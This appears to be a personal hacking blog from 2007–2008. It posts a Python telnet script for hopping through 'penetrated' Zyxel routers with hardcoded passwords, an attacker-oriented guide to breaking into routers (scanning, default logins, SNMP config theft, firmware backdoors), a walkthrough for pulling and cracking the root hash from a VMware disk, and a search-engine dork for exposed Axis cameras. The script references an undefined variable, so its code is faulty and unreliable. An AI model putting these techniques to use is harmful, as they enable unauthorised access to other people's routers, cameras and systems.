Tuesday 22 July 2008

Tigger Bounce

[code]
#Tigger 1.0 written by NOVA
#
#This script will allow you to bounce through 3 penetrated zyxell routers. and display the arp cache of the last system.
#Just edit the required data such as HOST and Passwords

import socket
import getpass
import sys
import telnetlib

#Place systems here
HOSTA = "192.168.0.1"
PASSA = "LLUcpe99\n"

HOSTB = "192.168.0.2"
PASSB = "LLUcpe99\n"

HOSTC = "192.168.0.3"
PASSC = "LLUcpe99\n"

PORT = "23"
tn = telnetlib.Telnet(HOSTA)

#RAS Commands

jmp1 = "ip telnet "+HOSTB+" "+PORT+"\n"
jmp2 = "ip telnet "+HOSTC+" "+PORT+"\n"

#Connect to 1st router.
print tn.read_until("Password: ")
tn.write(PASSA)
print tn.read_until("ras>")
tn.write(jmp1)

#Connect to second router.
print tn.read_until("Password: ")
tn.write(PASSB)
print tn.read_until("ras>")
tn.write(jmp2)

#Connect to third system.
print tn.read_until("Password: ")
tn.write(PASSC)
print tn.read_until("ras>")
tn.write(jmp3)

print tn.read_until("Password: ")
tn.write(PASSC)
print tn.read_until("ras>")
tn.write("ip arp status")

Thursday 29 November 2007

Router hacking

Port Scanning
----------------

One of the first steps in targeting routers is a port scan on the suspected addresses. Scanning for ports 23, 25 and 80 will usually provide plenty of routers to play with. I reccomend using nmap as you can combine it with grep to parse out the open systems and pipe them into a file. The next step is to go through your list of routers with a web browser (This may take some time).

Telnet
-------

Often telnet is used on routers which can be accessed via port 23, this provides an alternative command based configuratiuon that provides users with another doorway into the system. If an attacker cant access the main configuration page on port 80 then he will try port 23 as usually the login credentials are the same. Sometimes the information and utilities accessable via telnet are more detailed and can provide an attacker a wealth of information as well as tools to penetrate deeper into the network.

SMNP
------

Alot of routers i have come across use some form of smtp on port 161. This can be very useful to an attacker as quite often they are not secured and enable an attacker to download the configuration files and even extract a copy of the password. Passwords are usually encrypted but if they are like cisco then the strength of the algortithm is not enough as many tools exist on the internet to crack the password.

HTTP
------

This is the internal website of the router Usually the main web configuration page is on port 80 and can be accessed from any web browser. Here you can access the various network utilities for configuring your router. If an attacker has access to this page then its game over and your router can be considered OWNED lol. Many routers provide adequate security for preventing access but usually security is disabled or at best weak by default.

Gaining Access
-----------------

Once a router has been found an attacker has a couple of methods of access the main configuration pages. By testing the default usernames and passwords or trying to obtain the config files with the passwords contained inside you can sometimes access the router with relative ease. Personally i am suprised at the amount of routers which are not secure

Default Logins
----------------

Most Routers have a tendancy to use default login (admin:admin) Disabiling default logins or changing the password should prevent access to the main web configuration page builtin to the router. Some routers such as the ones BT provide do not come passwords, So attackers wanting to access a network have an easy time playing with BT users.

Config Files
--------------

Some routers have port 25 enabled by default, This can be used to obtain strings and enumerate various bits of data inside the router. Once valid strings have been found and the password has been obtained the next stage is to crack it. Finding out the encryption type is a simple matter of googling the router and finding out everything there is to know about it and the various algorithms it uses. Accessing a cisco was an easy job at one point as there were tools floating on the internet built for cracking the password stored in such config files.

Advancing your exploration
-------------------------------

Once an attacker has penetrated your router he has a choice. He can either download the firmware and modify it creating a new hidden account or start accessing your network.

Network Mapping
--------------------

Some Routers also have the ability to ping hosts connected to the local network. This could be used to map out the internal network before they implement port forwarding to access other systems on the network. This should be disabled to prevent malicious users from mapping out your network. However if they have access to the web config then they could enable it again.

Port Forwarding
------------------

Port forwarding is used to provide a sort of gateway to other systems on a network. If you know port 21 (FTP) is active on a system behind the router, Then turning on port forwarding and pointing the client to the routers IP will connect to the FTP port on the remote system.

Debugging VMware systems

The aim of this excercise is to debug the Virtual drive using cygwin to find the usernames and passwords of users on the system. We will then be using john the cracker for cracking the password. We will be using debian as the guest machine and the host is based on a winblows XP system.

Theory
=-=-=-

By examining a virtual drive we should be able to locate some basic stuff about the system. We are mainly looking for strings containing passwords, users, versions, services etc in this case stored in /etc directory. We also want to find a basic file structure and access restricted files stored by directly accessing the drive. If the system seems to be unencrypted, the data may be stored in clear text so by using simple tools we could access restricted data.

Once we have some basic information on the file structure we can determine the type of Operating system we have access to and where specific files are that we want to access.

Required Tools
=-=-=-=-=-=-=-
VMware
A Base Debian OS
Notepad
Cygwin (Linux environment for winblows) or a copy of linux
John the password cracker

Install CYGWIN
=-=-=-=-=-=-=-
1. Download Cygwin from the main website
2. Execute cygwin.exe
3. Follow the instructions selecting all files

Install VMware
=-=-=-=-=-=-=-
1. Goto the VMware website and download a copy of VMware server.
2. Install VMware server.
3. Configure the Host to use 128M of memory if based on a 256 Meg system.

Installing a Virtual Environment
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1. Create a new virtual machine.
2. Create a custom configuration.
3. Set the OS as Other Linux.
4. Select the name of the system i will be using (Virtual Debug).
5. Set the directory to /My documents/My virtual machines/Virtual Debug.
6. Make the machine private.
7. Run the Virtual machine as a user.
8. Select how many processors you have.
9. Select the amount of memory available to the environment.
10. Select host only networking.
11. Select a I/O adapter device.
12. Create a new virtual disk.
13. Select disk type.
14. Select disk size I have set it to 0.5Gb which is 500Mb.
15. Select the name and where to store the disk to.
16. Edit the settings of your environment and change the CDROM to boot from ISO image.
17. Install the system following all the instructions
18. Assign a root password, add this to a text file. This will be used as a wordlist.

Prepare the system for debugging
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Once you have an installed machine you can then copy the main vmdk file which contains the virtual disk, to a directory of your choice. personally i would copy one to c:\temp\drive.vmdk as this is easier to access from within cygwin. Once you have a drive to play with open up cygwin and edit your .bashrc config file by typing the following in to the bash prompt:

cat >> $HOME/.bashrc; export DRIVE=/cygdrive/c/temp/drive.vmdk

Restart the bash prompt and type:

echo $DRIVE

This should display the location of the virtual drive you selected. Now you are ready for the next step.

Ripping strings off the drive
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Ripping the strings from the drive and copying them to a file is easy just type at the bash prompt:

strings $DRIVE > $HOME/strings.txt

this file contains useful information is you know where to look. by searching through this file you can find a number of strings which can be used for accessing the virtual system. To search for strings use the grep by typing:

grep (string) $HOME/strings.txt

Searching for strings
=-=-=-=-=-=-=-=-=-=-=
Using the grep command can locate encrypted password, services and various bits of code and directories, so lets look for some encrypted passwords by using the grep command. Type:

grep :0: $HOME/strings.txt

you will notice that the screen will fill up with various bits of data, what we are interested in is this secti0on of text, or anything similar.

example code:
root::0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
root:$1$i0202sb/$lqo4ZWdu8fQ966TppSEVP1:13388:0:99999:7:::
daemon:*:13388:0:99999:7:::
bin:*:13388:0:99999:7:::
sys:*:13388:0:99999:7:::
sync:*:13388:0:99999:7:::
games:*:13388:0:99999:7:::
man:*:13388:0:99999:7:::
lp:*:13388:0:99999:7:::
mail:*:13388:0:99999:7:::
news:*:13388:0:99999:7:::

Notice that the string we searched for :0: is used in the shadow and password file located in the /etc directory. If you notice you will see that the hashed password is also displayed.

root: $1$i0202sb/$lqo4ZWdu8fQ966TppSEVP1 :13388:0:99999:7:::

The string between the root: and :13388 etc is the string we are after. Now that we have thins string you can pump it into a password cracker and retreive the hashed password for the system as root.

Summary
=-=-=-=

As you can see a virtual disk is vulnerable to various attacks as the data is stored as plain text. we can secure the drive by creating the system in your own account and placing it in a directory that only you have access to. Then we can start strengthening it with file encryption to make your virtual system, inaccessable from other accounts and from users using a boot disk to access your system.

Tuesday 27 November 2007

Security Cameras

Security Cameras
------------------

ok first post i have decided to post about SECURITY CAMERAS lol, you might be wondering why. Well here in the UK theres millions everywhere you go there are security cameras. And yet why do i feel so insecure.

I mean they arn't watching me are they. Well if i havnt got anything to hide why should i be bothered. Well heres a question for you hows your sex life. Thats right its none of my business right. well thats exactly how i feel. People knowing things i havnt even decided yet ?.

Nowback to the cameras. You think that only the police and the camera owner sees the end result yes. Wrong anyone can access a camera if they know what they are doing for example. there are a number of public exploits available for the AXIS web camera. you can even find them on google by typing "inurl:/view/view.shtml" minus the quotes into google.

As you will see there are many cameras to choose from. And this is not restricted to AXIS virtually all IP cameras have a web interface containing various strings which can identify a camera. for example justby finding the top 10 IP cameras sold in the UK and looking for a manual you can find the default login details and the remote administration page. It is that simple.

So when you are walking down the street just think who is being watched.